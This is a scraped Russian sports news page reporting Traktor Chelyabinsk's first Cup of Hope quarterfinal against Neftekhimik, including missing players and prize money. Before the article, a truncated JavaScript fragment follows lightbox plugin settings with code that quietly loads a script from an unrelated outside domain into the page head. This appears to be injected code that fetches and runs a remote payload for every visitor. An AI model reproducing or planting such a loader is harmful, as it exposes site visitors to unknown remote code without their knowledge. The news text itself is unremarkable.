, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

«Трактор» вступает в борьбу за Кубок Надежды

Сегодня, 14 марта, в Нижнекамске челябинский клуб проведет первую четвертьфинальную игру Кубка Надежды против местного «Нефтехимика». Команды выйдут на лед в 21:00 по челябинскому времени.

В Татарстан «Трактор» отправился без нескольких основных игроков. Помимо Евгения Кузнецова, расторгшего контракт с клубом по обоюдному согласию, на выезд не поехали нападающие Андрей Попов и Андрей Костицын, а также защитник Никита Хлыстов. Два Андрея залечивают старые травмы, что касается Хлыстова, то он отряжен в помощь «Белым Медведям», которые борются за Кубок Харламова. Вместо них в состав команды включены молодые хоккеисты: Данил Губарев, Игорь Черкасов и Егор Назаров.

Отметим, что серии играются до трех побед. 14 и 15 марта «Трактор» с «Нефтехимиком» сразятся в Нижнекамске, после чего переедут в Челябинск. В параллельном четвертьфинальном матче Восточной конференции играют «Авангард» и «Югра». Победитель Кубка Надежды получит 15 миллионов и право выбора в первом раунде драфта, серебряный призер станет богаче на 9 миллионов.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
13:49 - 14 марта 2014
|
автор: U-RSS
|
(507)
|
(0)

Комментарии (0)

Я человек
Я бот